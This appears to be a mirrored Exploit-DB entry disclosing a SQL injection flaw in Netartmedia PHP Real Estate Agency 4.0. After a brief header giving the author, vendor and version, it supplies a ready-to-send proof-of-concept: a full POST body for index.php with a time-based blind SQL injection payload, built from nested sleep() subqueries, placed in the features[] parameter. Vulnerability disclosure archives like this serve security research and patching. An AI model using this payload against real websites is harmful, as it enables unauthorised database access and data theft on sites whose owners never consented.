bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/46574.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
1 KiB
Text
Raw Permalink Blame History

# Exploit Title: Netartmedia PHP Real Estate Agency 4.0 - SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/propertyagency/
# Demo Site: https://www.phpscriptdemos.com/agency/
# Version: 4.0
# Tested on: Kali Linux
# CVE: N/A
# Description:PHP Real Estate Agency is a web software written in PHP
especially designed for real estate agencies to help create quickly
and launch their own websites with their listings and information on
it.
----- PoC SQLi -----
Request: http://localhost/[PATH]/index.php
Parameter: features[] (POST)
Payload: ad_type=&bathrooms=&bedrooms=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&field_location=1&listing_type=&location=&mod=search&only_pictures=1&order_by=date&pfield51_0=1&pfield51_1=1&pfield51_2=1&price_from=1&price_to=1&search_keyword=&search_type=search_form&size_from=1&size_to=1&type=1&zip=94102&zip_distance=94102&zip_radius=1&zip_type=1
Reference in a new issue View git blame Copy permalink